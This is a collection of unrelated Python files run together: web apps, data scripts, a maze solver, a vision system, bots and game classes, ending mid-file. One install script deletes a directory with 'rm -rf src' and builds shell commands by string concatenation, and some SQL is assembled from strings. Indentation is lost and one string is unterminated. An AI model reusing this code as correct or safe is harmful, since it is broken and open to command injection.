def login(self, nombre, password):
print 'fer2'
return self.app.post('/login', data=dict(
name = nombre,
passWord = password),
follows_redirects = True
)
def test_login(self):
rv = self.login('admin', 'default')
print str(rv.data)
#def testSave(self):
# r = self.usuario1.add_usr()
# print "Creamos un usuario nuevo" + self.usuario1.nombre
# assertEqual(r, "Exito" )
# self.contador = 1
if __name__ == '__main__':
unittest.main() |
import json, requests, os
CA_FILE = 'data-hold/california.json'
if not os.path.exists(CA_FILE):
print("Can't find" + CA_FILE + "so fetching remote copy...")
resp = requests.get("http://stash.compjour.org/data/usajobs/california-all.json")
f = open(CA_FILE, 'w')
f.write(resp.text)
f.close()
rawdata = open(CA_FILE).read()
jobs = json.loads(rawdata)['jobs']
def cleanmoney(val):
x = val.replace("$", "").replace(",", "")
return float(x)
def cleansalarymax(job):
return cleanmoney(job['SalaryMax'])
sortedjobs = sorted(jobs, key = cleansalarymax, reverse = True)
for job in sortedjobs[0:5]:
print('%s,%d,%d' % (job['JobTitle'], cleanmoney(job['SalaryMin']), cleanmoney(job['SalaryMax']))) |
level = [
"WWWWWWWWWWXXWWWWWWWWWW",
"W W",
"W WWWWWWWWWWWWWWWWWW W",
"W W W W",
"W W WWWWWW WWWWWW W W",
"W W W W W W",
"W W WWWW W W WWWW W W",
"W W W W W W W W",
"W WWWW W W WWWW W",
"W W WWWW W W",
"W WWWWWW WWWWWW W",
"W W WXXW W W",
"W WWWWW WWXXWW WWWWW W",
"X WXXXXW X",
"W WWWWW WWWWWW WWWWW W",
"W W W W",
"W WWWWWW X WWWWWW W",
"W W WWWW W W",
"W WWWW W W WWWW W",
"W W W W W W W W",
"W W WWWW W W WWWW W W",
"W W W W W W",
"W W WWWWWW WWWWWW W W",
"W W W W",
"W WWWWWWWWWWWWWWWWWW W",
"W W",
"WWWWWWWWWWXXWWWWWWWWWW",
]
bx = int(input())
by = int(input())
ex = int(input())
ey = int(input())
step = []
col_length = len(level)
row_length = len(level[0])
for row in range(col_length+10):
lis = []
for col in range(row_length+10):
lis.append(50)
step.append(lis)
step[bx][by] = 0
x_queue = [bx]
y_queue = [by]
while x_queue:
x = x_queue.pop()
y = y_queue.pop()
if x+1<col_length and step[x+1][y]>step[x][y]+1 and level[x+1][y]!='W':
x_queue.append(x+1)
y_queue.append(y)
step[x+1][y] = step[x][y]+1
if x-1>=0 and step[x-1][y]>step[x][y]+1 and level[x-1][y]!='W':
x_queue.append(x-1)
y_queue.append(y)
step[x-1][y] = step[x][y]+1
if y+1<row_length and step[x][y+1]>step[x][y]+1 and level[x][y+1]!='W':
x_queue.append(x)
y_queue.append(y+1)
step[x][y+1] = step[x][y]+1
if y-1>=0 and step[x][y-1]>step[x][y]+1 and level[x][y-1]!='W':
x_queue.append(x)
y_queue.append(y-1)
step[x][y-1] = step[x][y]+1
print(step[ex][ey])
|
from cnn import AnimalClassifier
if __name__ == '__main__':
classifier = AnimalClassifier()
classifier.makeModel()
# classifier.train('data/training', 'data/validation/')
prediction = classifier.classify('data/validation/airplane/airplane01.tif')
print('Image is classified as: ', prediction)
|
#----------------------------------------------#
# Autonomous Vehicle Machine Vision System #
# Machine Vision System #
# machineVision.py #
# Written by: #
# Jeremy Beauchamp, Zhaojie Chen, #
# Trenton Davis, and Xudong Yuan #
#----------------------------------------------#
'''
This file contains the overall Machine Vision System as well as any constants that
are necessary. All of the functionality of the whole system is contained in this
single file.
'''
# Import libraries
import time
import threading
from queue import Queue
import cv2
# Import modules
import imageData as imd
import gui as g
import stabilizer as s
import enhancer as e
import objects as o
import event as ev
import trafficLightDetector as tld
import yellowline_detection as yd
# MachineVision Class
################################################################################
class MachineVision:
'''
The MachineVision class is the overall class that contains the Autonomous
Vehicle Machine Vision System.
:ivar camera: the camera used to capture images
:ivar gui: the GUI that displays the images
:ivar stabilizer: the video stabilizer
:ivar enhancer: the image enhancer
:ivar BufferSize: the amount of images stored in the buffer
:ivar ImageBuffer: the buffer storing images
:ivar BufferIndex: the current index in the buffer
'''
def __init__(self, video, objectSet = []):
'''
Creates all variables.
:type camera: Camera object
:param camera: the camera used for capturing images
'''
self.cap = cv2.VideoCapture(video)
self.gui = g.GUI()
self.stabilizer = s.Stabilizer()
self.enhancer = e.Enhancer()
self.event = ev.Event(objectSet)
self.trafficLightNN = tld.TrafficLightDetector()
LookoutRange = [1.5, 2, 2.5, 3, 3.5, 4, 4.5, 5.5, 6.5, 7.5] #[1.5, 2.5, 3.5, 5, 7]#
Region_WB = [250, 270, 360, 380]
self.line_detec = yd.yellowline(self.cap, LookoutRange, Region_WB)
self.current = 0
self.BufferSize = 0
self.ImageBuffer = []
self.BufferIndex = 0
self.printLock = threading.Lock()
self.trafficLock = threading.Lock()
self.lineLock = threading.Lock()
self.q = Queue()
def initialize(self):
'''
Creates image buffer and activates the camera and GUI.
'''
self.BufferSize = 15
self.ImageBuffer = []
for i in range (self.BufferSize):
self.ImageBuffer.append(imd.ImageData(0))
self.stabilizer.smoothingWindow = self.BufferSize
self.gui.activate()
self.trafficLightNN.activate()
#self.enhancer.x = self.camera.RES[0]
#self.enhancer.y = self.camera.RES[1]
self.enhancer.x = 640
self.enhancer.y = 480
for i in range (2):
self.q.put(i)
def shutdown(self):
'''
Shutsdown the camera and GUI.
'''
if(self.gui.active):
self.gui.deactivate()
def detectTrafficLight(self):
'''
Detects if there is a traffic light presetn.
'''
while(True):
res1, res2 = self.trafficLightNN.detect(self.current)
self.event.objects[0].active = res1
self.event.objects[0].green = res2
def detectYellowLines(self):
'''
Detects if there are yellow lines on the screen.
'''
while(True):
_,res1,res2,res3,res4,res5 = self.line_detec.line_detec(self.current)
self.event.objects[1].active = res1
self.event.objects[1].leftLine = res2
self.event.objects[1].rightLine = res3
self.event.objects[1].turning = res4
self.event.objects[1].turnRight = res5
def assignJob(self):
'''
Assigns jobs for the multithreading to work.
'''
i = self.q.get()
if(i == 0):
self.detectTrafficLight()
elif(i == 1):
self.detectYellowLines()
self.q.task_done()
def oneLoop(self):
self.current = imd.ImageData(self.camera.capture())
self.current.frame = self.enhancer.enhance(self.current)
# if(self.BufferIndex > 1):
# previous = self.ImageBuffer[self.BufferIndex - 1]
# self.current.frame = self.stabilizer.stabilize(previous, self.current)
for i in range (2):
t = threading.Thread(target = self.assignJob)
t.daemon = True
t.start()
if(self.event.objects[0].active):
print("Light Detected")
if(self.event.objects[0].green):
print("Green")
else:
print()
# if(self.gui.active):
# self.gui.display(self.current)
self.ImageBuffer[self.BufferIndex] = self.current
self.BufferIndex = self.BufferIndex + 1
if(self.BufferIndex >= self.BufferSize):
self.BufferIndex = 0
return self.current, self.event.convert()
def run(self):
'''
Runs the entire Machine Vision System.
'''
self.initialize()
timePerFrame = 1.0 / 15
self.current = imd.ImageData(0)
previous = imd.ImageData(0)
try:
while(self.cap.isOpened()):
start = time.time()
_, image = self.cap.read()
self.current = imd.ImageData(image)
self.current.frame = self.enhancer.enhance(self.current)
# if(self.BufferIndex > 1):
# previous = self.ImageBuffer[self.BufferIndex - 1]
# self.current.frame = self.stabilizer.stabilize(previous, self.current)
for i in range (2):
t = threading.Thread(target = self.assignJob)
t.daemon = True
t.start()
if(self.event.objects[0].active):
print("Light Detected")
if(self.event.objects[0].green):
print("Green")
else:
print()
if(self.gui.active):
self.gui.display(self.current)
else:
break
self.ImageBuffer[self.BufferIndex] = self.current
self.BufferIndex = self.BufferIndex + 1
if(self.BufferIndex >= self.BufferSize):
self.BufferIndex = 0
end = time.time()
if((end - start) < timePerFrame):
time.sleep(timePerFrame - (end - start))
except KeyboardInterrupt:
pass
self.shutdown()
################################################################################
|
from flask import Flask, jsonify, request
from flask_sqlalchemy import SQLAlchemy
from flask_restful import Resource, Api
import utils
API_VERSION = 'v1'
STARTING_BOARD = [[None, None, None], [None, None, None], [None, None, None]]
VALID_COMMANDS = ['start', 'board', 'move', 'help', 'pony']
app = Flask(__name__)
api = Api(app)
app.config.from_pyfile('config.cfg')
app.config['API_VERSION'] = API_VERSION
app.config['STARTING_BOARD'] = STARTING_BOARD
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://{}:{}@{}/{}'.format(
app.config['DB_USERNAME'],
app.config['DB_PASSWORD'],
app.config['DB_SERVER'],
app.config['DB_NAME'],
)
db = SQLAlchemy(app)
from board import Board
class Hook(Resource):
def post(self):
data = request.form
# Ensure our slack token is valid
if data["token"] != app.config['SLACK_TOKEN']:
return "Error: Invalid Slack API Token"
text = data['text'].split()
if len(text) < 1:
return """Please specify a command {} and any argument/s."""\
.format(str(VALID_COMMANDS))
command = text[0]
if command not in VALID_COMMANDS:
return """{} is not a valid command. The valid commands are {}."""\
.format(command, str(VALID_COMMANDS))
args = text[1:]
# Call our respective board command
response = getattr(Board, command)(data, args)
return jsonify({
'response_type': 'in_channel',
'text': response
})
api.add_resource(Hook, '/{}/hook'.format(app.config['API_VERSION']))
if __name__ == "__main__":
app.run(host='0.0.0.0')
|
#将接收到的FTP字节流直接发送给UE侧
#!/usr/lib/python3.4
#-*-coding:utf-8-*-
import socket
import os, struct
def ftp_sendfile(addr,localpath = '/home/nano/openair-cn'):
ftp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ftp_sock.connect(addr)
print('连接上了!')
while True:
#file_path = input('Please Enter File Path:\r\n')
if os.path.isfile(localpath): #如果文件存在
print('进入')
fileinfo_size = struct.calcsize('128sl')#定义打包规则
#定义文件头信息,包含文件名和大小
byte_filepath = bytes(os.path.basename(localpath),encoding='utf-8')
fhead = struct.pack('128sl', byte_filepath, os.stat(localpath).st_size)
ftp_sock.send(fhead)
fo = open(localpath, 'rb')
while True:
filedata = fo.read(1024)
if not filedata:
break
ftp_sock.send(filedata)
fo.close()
print('send over...')
break
ftp_sock.close()
if __name__ == '__main__':
ftp_sendfile(('127.0.0.1',12345))
|
from django import template
from django.template.defaultfilters import stringfilter
from django.shortcuts import HttpResponse
from django.contrib import messages
register = template.Library()
@register.filter(name='splitdamage')
@stringfilter
def splitdamage(string):
spal=string.split(",")
sspal=spal[-1].split("/")
if len(sspal) > 6:
return sspal[8]
else:
return sspal[7]
@register.filter(name='tablet_history')
@stringfilter
def tablet_history(string):
spal=string.split(",")
tablets=[]
for s in spal:
tablet=[]
sspal=s.split("/")
for ss in sspal:
tablet.append(ss)
tablets.append(tablet)
return tablets
@register.filter(name='get_name')
@stringfilter
def get_name(string):
from main.models import Center
cid=int(string)
nam=Center.objects.get(center_id=cid)
name=nam.name
return name
@register.filter(name='spitdamage')
@stringfilter
def spitdamage(string):
from main.models import Database
db=Database.objects.get(id=string)
pal=db.previous_allotment
pc=db.previous_centers
if pal != "":
spal=pal.split(",")
sspal=spal[-1].split("/")
if sspal[6] == "D":
return sspal[8]
if pc != "":
spal=pc.split(",")
sspal=spal[-1].split("/")
if sspal[5] == "D":
return sspal[7] |
import pandas as pd
df_1=pd.read_csv("E:/Ramya/brushUps/Basics/CASE_STUDIES/GOOD_READS/Data/WorstBooks.csv")
df_2=pd.read_csv("E:/Ramya/brushUps/Basics/CASE_STUDIES/GOOD_READS/Data/tempWorstBooks.csv")
df_2.columns=list(df_1.columns)
empty_df_2=df_2.groupby(['title']).get_group('0')
for index,row in empty_df_2.iterrows():
df_2.drop(index,inplace=True)
df_1.update(df_2,overwrite=True)
empty_df_1=df_1.groupby(['title']).get_group('0')
for index,row in empty_df_1.iterrows():
df_1.drop(index,inplace=True)
df_1.to_csv("E:/Ramya/brushUps/Basics/CASE_STUDIES/GOOD_READS/Data/worstBooksdetails.csv")
|
################################ DESCRIPTION ##################################
# Description: List ALL Services deployed in OSB Domain with Regular Expression
# Match.
#
# Author: Jesus A. Ruiz - linuxwayven@gmail.com
# Place: Caracas - Venezuela - Oracle de Venezuela
# Date: 16/06/15
#
# History
# 16/06/15 The Begin V1.0
#
# Quota: The Key to grown: Hard work.
#
###############################################################################
# Import Section
import socket
import os
import time
import re #Regular Expression Package
from com.bea.wli.sb.management.configuration import ALSBConfigurationMBean
from com.bea.wli.config import Ref
from java.lang import String
from com.bea.wli.config import Ref
from com.bea.wli.sb.util import Refs
from com.bea.wli.sb.management.configuration import CommonServiceConfigurationMBean
from com.bea.wli.sb.management.configuration import SessionManagementMBean
from com.bea.wli.sb.management.configuration import ProxyServiceConfigurationMBean
from com.bea.wli.monitoring import StatisticType
from com.bea.wli.monitoring import ServiceDomainMBean
from com.bea.wli.monitoring import ServiceResourceStatistic
from com.bea.wli.monitoring import StatisticValue
from com.bea.wli.monitoring import ResourceType
from weblogic.management.mbeanservers.edit import NotEditorException
from java.io import FileInputStream
PROP_FILE_NAME = "weblogic.properties"
def loadProperties ():
# Read Properties File
propInputStream = FileInputStream(PROP_FILE_NAME)
configProps = Properties()
configProps.load(propInputStream)
print 'Properties File Loaded'
return configProps;
# Load Configuration Properties
configuration = loadProperties();
# Set some constants
SCRIPT_NAME = 'get_osb_services_list_filtered_re.py'
DESCRIPTION = 'List ALL Services deployed in OSB Domain with Regular Expression Match.'
AUTHOR = 'Jesus A. Ruiz - linuxwayven@gmail.com'
WL_USERNAME = configuration.get("admin.username")
WL_PASSWORD = configuration.get("admin.password")
DOMAIN_PORT = configuration.get("domain.port")
RUN_USERNAME = os.getlogin()
LOCALHOST = socket.gethostname()
DOMAIN_NAME = os.getenv('WL_DOMAIN')
DOMAIN_DIR = os.getenv('WL_DOMAIN_DIR')
MWHOME = os.getenv('MW_HOME')
URL_CONNECT = configuration.get("domain.protocol") + '://' + LOCALHOST + ':' + DOMAIN_PORT
print "URL CONNECT" + URL_CONNECT
ACTUAL_TIME = time.strftime("%H:%M:%S")
ACTUAL_DATE = time.strftime("%d/%m/%Y")
# Information Screen
print '#########################################################################'
print '#'
print '# DATE: ' + ACTUAL_DATE
print '# TIME: ' + ACTUAL_TIME
print '# MW HOME: ' + MWHOME
print '# SCRIPT NAME: ' + SCRIPT_NAME
print '# DESCRIPTION: ' + DESCRIPTION
print '# URL CONNECTION: ' + URL_CONNECT
print '#'
print '# AUTHOR: ' + AUTHOR
print '#'
print '#########################################################################'
print
print
# Connect with WL Server..
print 'Try connection ..'
print
connect(WL_USERNAME, WL_PASSWORD, URL_CONNECT)
### Get the Configuration Manager
cfgManager = getConfigManager()
try:
cfgManager.getChanges()
print '===> Currently there is a Session'
if cfgManager.isEditor() == true:
### You are making changes!!!
print '===> Looks like you started that session'
print '===> You can check the console for any pending changes'
print '===> Try rerunning this script after you release or commit the pending changes'
exit()
except NotEditorException, e:
if cfgManager.getCurrentEditor() is None:
### No session
print 'No active session .. OK'
pass
else:
### Someone else is making changes
userWithSession = cfgManager.getCurrentEditor().replace(' ', '')
print '===> Currently there is a Session'
print '===> User \"' +userWithSession+'\" is making the changes'
print '===> Wait until \"' +userWithSession+'\" complete the current session'
exit()
pass
except Exception:
### Other Errors
print '===> Error, see log for more info'
exit()
print
print
# Main
domainRuntime()
servers = domainRuntimeService.getServerRuntimes();
print('################################################################')
print('# Java heap information per server')
print('################################################################')
print('%20s %10s %8s %8s %4s' % ('Server','Current','Free','Max','Free'))
for server in servers:
free = int(server.getJVMRuntime().getHeapFreeCurrent())/(1024*1024)
freePct = int(server.getJVMRuntime().getHeapFreePercent())
current = int(server.getJVMRuntime().getHeapSizeCurrent())/(1024*1024)
max = int(server.getJVMRuntime().getHeapSizeMax())/(1024*1024)
print('%20s %7d MB %5d MB %5d MB %3d%%' % (server.getName(),current,free,max,freePct))
print
print
print 'Look for ALSB Object ..'
alsbCore = findService(ALSBConfigurationMBean.NAME, ALSBConfigurationMBean.TYPE)
print '.. OK'
print 'Find info about OSB Service Deployed ..'
allRefs = alsbCore.getRefs(Ref.DOMAIN)
STRING_MATCH = "BOLP"
for ref in allRefs:
# Get Types
typeID = ref.getTypeId()
serviceFullName = ref.getFullName()
if typeID == "ProxyService" :
result = re.search(STRING_MATCH, ref.getFullName())
if result != None:
print 'Proxy : ' + serviceFullName
print
print
print
# Disconnect from Server..
print 'Disconnecting from Server ..'
disconnect()
# The End
print
print 'Exiting from the script now ..'
exit()
|
from tkinter import *
class Item:
def __init__(self):
self.__itemDictionary = {}
self.__roomOneDialogue = None
self.__roomTwoDialogue = None
self.__roomThreeDialogue = None
self.__numTries = 0
self.__roomOneAnswer = "dog"
self.__itemOne = "Random"
self.__itemTwo = "Picture Frame"
self.__itemThree = "Toy Car"
self.__itemFour = "Beaker"
def roomOneDialogue(self):
self.__roomOneDialogue = "Hello World! You have three tries."
return self.__roomOneDialogue
def roomTwoDialogue(self):
self.__roomTwoDialogue = "Bye World!"
return self.__roomTwoDialogue
def roomThreeDialogue(self):
self.__roomThreeDialogue = "I ran out of ideas"
return self.__roomThreeDialogue
def checkAnswer(self, userAnswer):
self.__numTries = self.__numTries + 1
if self.__numTries <= 3:
itemGained=self.guessTheAnswer(userAnswer)
else:
messagebox.showwarning(
'NO MORE TRIES',
"You have no more attempts")
itemGained=False
if itemGained == True:
messagebox.showinfo(
'Item Found',
"You've found an item")
elif itemGained == False:
messagebox.showwarning(
'NO ITEM GAINED',
"You did not find the item")
def guessTheAnswer(self, entryData):
while entryData != self.__roomOneAnswer:
messagebox.showwarning(
'INCORRECT',
"That is not the correct answer, try again")
itemGained = False
return itemGained
if entryData == self.__roomOneAnswer:
itemGained = True
return itemGained
class RoomTwo(Item):
def __init__(self):
self.__roomTwoAnswer = "human"
def guessTheAnswer(self, entryData):
while entryData != self.__roomTwoAnswer:
messagebox.showwarning(
'INCORRECT',
"That is not the correct answer, try again")
itemGained = False
return itemGained
if entryData == self.__roomTwoAnswer:
itemGained = True
return itemGained
class RoomThree(Item):
def __init__(self):
self.__roomThreeAnswer = "mind
def guessTheAnswer(self, entryData):
while entryData != self.__roomThreeAnswer:
messagebox.showwarning(
'INCORRECT',
"That is not the correct answer, try again")
itemGained = False
return itemGained
if entryData == self.__roomThreeAnswer:
itemGained = True
return itemGained
|
# Copyright 2022 Ecosoft Co., Ltd (https://ecosoft.co.th)
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl.html)
from openerp import models, fields, api
class SaleOrder(models.Model):
_inherit = "sale.order"
delivery_bill_count = fields.Integer(
string="Delivery Bill Count",
compute="_compute_delivery_bill_count",
)
delivery_bill_ids = fields.One2many(
comodel_name="temporary.delivery.bill",
inverse_name="order_id",
)
@api.multi
@api.depends("delivery_bill_ids")
def _compute_delivery_bill_count(self):
for rec in self:
rec.delivery_bill_count = len(rec.delivery_bill_ids)
@api.multi
def view_temporary_delivery_bill(self):
self.ensure_one()
action = self.env.ref(
"sale_temporary_delivery_bill.temporary_delivery_bill_action")
result = action.read()[0]
# Update context
context = self._context.copy()
context.update({
"default_partner_id": self.partner_id.id,
"default_order_id": self.id,
"default_delivery_bill_lines": [(0, 0, {
"product_id": line.product_id.id,
"product_uom_qty": line.product_uom_qty,
"product_uom": line.product_uom.id
}) for line in self.order_line]
})
# Update result
result.update({
"context": context,
"domain": [("order_id", "=", self.id)]
})
return result
|
import os
import logging
logging.basicConfig(level=logging.DEBUG,
format='%(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')
def clone(service, dir, remote='https://github.com/'):
os.system('cd src/' + dir + ' && git clone ' + remote + service + '.git')
def run(arg):
logging.info('Install')
logging.warning('It will be clean and install, please make sure it is safe ?')
safe = raw_input('( install / clean / other type is cancel )')
if safe == 'install' or safe == 'clean':
if safe == 'clean':
os.system('rm -rf src')
os.system('mkdir src')
os.system('mkdir src/default')
clone('ros/catkin', ' ')
clone('EasyROS/ROServer', 'default')
clone('EasyROS/shellservice', 'default')
clone('EasyROS/webservice', 'default')
clone('EasyROS/env_public', 'default')
def exe(arg):
logging.info('Install')
clone(arg, 'default')
|
#
# IMPORTS
#
from snack import *
from model.config import GA_VERSION
#
# CONSTANTS
#
#
# CODE
#
class FirstScreen:
"""
Verify the hard disk selected is part od a LVM Volume Group
"""
def __init__(self, screen):
"""
Constructor
@type screen: SnackScreen
@param screen: SnackScreen instance
"""
self.__screen = screen
self.__grid = GridForm(self.__screen, "IBM zKVM", 1, 1)
# __init__()
def show(self):
"""
Displays a message
@type msg: str
@param msg: message to be displayed
@rtype: nothing
@returns: nothing
"""
omsg = TextboxReflowed(30, "IBM zKVM %s..." % GA_VERSION)
self.__grid.add(omsg, 0, 0)
self.__grid.draw()
self.__screen.refresh()
# show()
# FirstScreen
|
# -*- coding: utf-8 -*-
from PIL import Image, ImageDraw, ImageFont
from pibooth import fonts
from pibooth.pictures import resize_keep_aspect_ratio
def concatenate_pictures(pictures, footer_texts, bg_color, text_color):
"""
Merge up to 4 PIL images and retrun concatenated image as a new PIL image object.
Configuration of the final picture depends on the number of given pictues::
+---------+ +---------+ +---+-+---+ +---------+
| | | +-+ | | |1| | | +-+ +-+ |
| | | |1| | | +-+ | | |1| |2| |
| +-+ | | +-+ | | +-+ | | +-+ +-+ |
| |1| | | | | |2| | | |
| +-+ | | +-+ | | +-+ | | +-+ +-+ |
| | | |2| | | +-+ | | |3| |4| |
| | | +-+ | | |3| | | +-+ +-+ |
+---------+ +---------+ +---+-+---+ +---------+
"""
widths, heights = zip(*(i.size for i in pictures))
# starting here we consider that all the images have the same height and widths
inter_width = max(heights) // 20
if len(pictures) == 1:
new_width = max(widths) + inter_width * 2
new_height = max(heights) + inter_width * 2
elif len(pictures) == 2:
new_width = max(widths) + inter_width * 2
new_height = max(heights) * 2 + inter_width * 3
elif len(pictures) == 3:
new_width = max(widths) + inter_width * 2
new_height = max(heights) * 3 + inter_width * 4
elif len(pictures) == 4:
new_width = max(widths) * 2 + inter_width * 3
new_height = max(heights) * 2 + inter_width * 3
else:
raise ValueError("List of max 4 pictures expected, got {}".format(len(pictures)))
matrix = Image.new('RGB', (new_width, new_height), color=bg_color)
x_offset = inter_width
y_offset = inter_width
# Consider that the photo are correctly ordered
matrix.paste(pictures[0], (x_offset, y_offset))
if len(pictures) == 2:
y_offset += (pictures[0].size[1] + inter_width)
matrix.paste(pictures[1], (x_offset, y_offset))
elif len(pictures) == 3:
y_offset += (pictures[0].size[1] + inter_width)
matrix.paste(pictures[1], (x_offset, y_offset))
y_offset += (pictures[1].size[1] + inter_width)
matrix.paste(pictures[2], (x_offset, y_offset))
elif len(pictures) == 4:
x_offset += (pictures[0].size[0] + inter_width)
matrix.paste(pictures[1], (x_offset, y_offset))
y_offset += (pictures[1].size[1] + inter_width)
x_offset = inter_width
matrix.paste(pictures[2], (x_offset, y_offset))
x_offset += (pictures[2].size[0] + inter_width)
matrix.paste(pictures[3], (x_offset, y_offset))
matrix = matrix.resize(resize_keep_aspect_ratio(matrix.size, (2400, 3000)), Image.ANTIALIAS)
final_width, final_height = 2400, 3600
final_image = Image.new('RGB', (final_width, final_height), color=bg_color)
final_image.paste(matrix, ((final_width - matrix.size[0]) // 2, (3000 - matrix.size[1]) // 2))
# Text part
x_offset = 300
y_offset = 2900
draw = ImageDraw.Draw(final_image)
name_font = ImageFont.truetype(fonts.get_filename("Amatic-Bold.ttf"), 400)
name_width, _ = draw.textsize(footer_texts[0], font=name_font)
draw.text(((final_width - name_width) // 2, y_offset), footer_texts[0], text_color, font=name_font)
date_font = ImageFont.truetype(fonts.get_filename("AmaticSC-Regular.ttf"), 200)
date_width, _ = draw.textsize(footer_texts[1], font=date_font)
draw.text(((final_width - date_width) // 2, y_offset + 400), footer_texts[1], text_color, font=date_font)
return final_image
def generate_picture_from_files(image_files_list, footer_texts, bg_color=(255, 255, 255), text_color=(0, 0, 0)):
"""
Generate a picture by concatenating the images in the image_files_list
"""
list_pil_images = [Image.open(img) for img in image_files_list]
return concatenate_pictures(list_pil_images, footer_texts, bg_color=bg_color, text_color=text_color)
|
from table_to_entity import *
class Template(Object):
def get_template(self, *args, **kwargs) -> str:
pass
class TsCypressTemplate(Template):
_TEMPLATE = ''' namespace Cypress {
type %s = {
%s
}
}'''
def get_template(self, *args, **kwargs) -> str:
"""
:param args:
:param kwargs: class_name = str, params = []
:return:
"""
s1 = kwargs['entity_name']
s2 = ';\n '.join(['%s : %s' % (i[0], i[1]) for i in kwargs['fields']]) + ';'
return self._TEMPLATE % (s1, s2)
|
a=int(input('enter value of a:'))
b=int(input('enter value of b:'))
try:
c=a+b
d=a-b
e=a/0
print(c,d,e)
except Exception as e:
print(e)
|
from utils.parse_input import fetch_input
from typing import List
def part1(parsed_inputs: List[int]) -> int:
"""
Problem: Find numbers the pairing in a list of numbers which add up to 2020, then return their product
"""
s = set(parsed_inputs)
for n in parsed_inputs:
rem = 2020 - n
if rem in s:
return n * rem
return -1
def part2(parsed_inputs: List[int]) -> int:
"""
Problem: find 3 numbers in a list where the numbers add up to 2020 and return their product
"""
s = set(parsed_inputs)
for i in range(len(parsed_inputs) - 1):
n = parsed_inputs[i]
rem = 2020 - n
for j in range(i, len(parsed_inputs)):
curr = parsed_inputs[j]
if (rem - curr) in s:
return n * curr * (rem - curr)
return -1
def main():
parsed_inputs = [int(i) for i in fetch_input('day1-input.txt')]
print("part 1 solution: {}".format(part1(parsed_inputs)))
print("part 2 solution: {}".format(part2(parsed_inputs)))
if __name__ == '__main__':
main() |
# Generated by Django 3.0.8 on 2020-07-17 09:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('GoForHolidayApp', '0002_remove_placeinfo_experience'),
]
operations = [
migrations.AddField(
model_name='placeinfo',
name='arrivalTime',
field=models.CharField(default='', max_length=10),
preserve_default=False,
),
migrations.AddField(
model_name='placeinfo',
name='departureTime',
field=models.CharField(default=' ', max_length=10),
preserve_default=False,
),
migrations.AddField(
model_name='placeinfo',
name='experience',
field=models.TextField(default=' ', max_length=1000),
preserve_default=False,
),
]
|
from telebot import types
class LotsManager:
def __init__(self, bot):
self.bot = bot
self.connection = bot.connection
def get_lots(self, user, only_created=False):
cur = self.connection.cursor()
show_all = user.get_property('show_all')
if show_all:
if not only_created:
cur.execute("SELECT * FROM lots")
else:
cur.execute("SELECT * FROM lots WHERE user_id=%s", (user.id,))
else:
cur.execute("SELECT * FROM lots WHERE id IN(SELECT lot_id FROM favourite WHERE user_id=%s)", (user.id,))
return cur.fetchall()
def search_lots(self, user, keyword):
cur = self.connection.cursor()
show_all = user.get_property('show_all')
if show_all:
cur.execute("SELECT * FROM lots WHERE title LIKE %s", ('%' + keyword + '%',))
else:
cur.execute("""SELECT * FROM lots WHERE title LIKE %s AND
id IN(SELECT lot_id FROM favourite WHERE user_id=%s)""", ('%' + keyword + '%', user.id,))
return cur.fetchall()
def get_lot_by_title(self, title):
cur = self.connection.cursor()
cur.execute("SELECT * FROM lots WHERE title=%s", (title,))
resp = cur.fetchone()
return resp
def is_title_free(self, title):
return self.get_lot_by_title(title) is None
def create_lot(self, user):
title = user.get_property('lot_title')
desc = user.get_property('lot_description')
price = user.get_property('lot_price')
keys = user.get_property('lot_keys')
basic_keys_count = len(keys.split('\n'))
cur = self.connection.cursor()
cur.execute("INSERT INTO lots (title, description, bunch, price, basic_keys_count, user_id) "
"VALUES(%s, %s, %s, %s, %s, %s)", (title, desc, keys, price, basic_keys_count, user.id))
self.connection.commit()
def update_lot(self, user):
id = user.get_property('lot_id')
title = user.get_property('lot_title')
desc = user.get_property('lot_description')
price = user.get_property('lot_price')
keys = user.get_property('lot_keys')
cur = self.connection.cursor()
cur.execute("UPDATE lots SET title=%s, description=%s, price=%s, bunch=%s WHERE id=%s", (title, desc, price, keys, id))
self.connection.commit()
def get_property(self, id, name):
cursor = self.bot.connection.cursor()
cursor.execute("SELECT " + name + " FROM lots WHERE id=%s", (id,))
resp = cursor.fetchone()
return resp[0]
def set_property(self, id, name, value):
cursor = self.bot.connection.cursor()
cursor.execute("UPDATE lots SET " + name + "=%s WHERE id=%s", (value, id))
self.connection.commit()
def delete_lot(self, id):
cursor = self.bot.connection.cursor()
cursor.execute("DELETE FROM lots WHERE id=%s", (id,))
self.connection.commit()
def get_owner_address(self, id):
owner_id = self.get_property(id, 'user_id')
cursor = self.bot.connection.cursor()
cursor.execute("SELECT address FROM users WHERE id=%s", (owner_id,))
return cursor.fetchone()[0]
def put_like(self, id, user_id):
cursor = self.bot.connection.cursor()
cursor.execute("UPDATE lots SET likes=likes+1 WHERE id=%s", (id,))
cursor.execute("INSERT INTO favourite (user_id, lot_id) VALUES(%s, %s)", (user_id, id))
self.connection.commit()
def put_dislike(self, id, user_id):
cursor = self.bot.connection.cursor()
cursor.execute("UPDATE lots SET dislikes=dislikes+1 WHERE id=%s", (id,))
cursor.execute("DELETE FROM favourite WHERE user_id=%s AND lot_id=%s", (user_id, id))
self.connection.commit()
def get_keys_count(self, id):
bunch = self.get_property(id, 'bunch')
if bunch == '':
return 0
else:
return len(bunch.split('\n'))
def get_key(self, id):
bunch = self.get_property(id, 'bunch')
if bunch == '':
return None
else:
keys = bunch.split('\n')
return keys[0]
def clear_key(self, id):
bunch = self.get_property(id, 'bunch')
if bunch == '':
return
else:
keys = bunch.split('\n')
bunch = ''
for i in range(1, len(keys)):
bunch = bunch + keys[i]
if i + 1 < len(keys):
bunch = bunch + '\n'
self.set_property(id, 'bunch', bunch)
def show_info(self, lot_id, user):
title = self.get_property(lot_id, 'title')
desc = self.get_property(lot_id, 'description')
status = self.get_property(lot_id, 'active')
likes = self.get_property(lot_id, 'likes')
dislikes = self.get_property(lot_id, 'dislikes')
available = self.get_keys_count(lot_id)
all = self.get_property(lot_id, 'basic_keys_count')
sold = all - available
msg_text = user.lang.LOT_INFO.format(title, desc, status, all, sold, available, likes, dislikes)
markup = types.InlineKeyboardMarkup()
user_id = self.get_property(lot_id, 'user_id')
price = self.get_property(lot_id, 'price')
if user_id == user.id:
markup.add(types.InlineKeyboardButton(text=user.lang.ACTIVATE_BTN,
callback_data=user.lang.ACTIVATE_BTN),
types.InlineKeyboardButton(text=user.lang.DEACTIVATE_BTN,
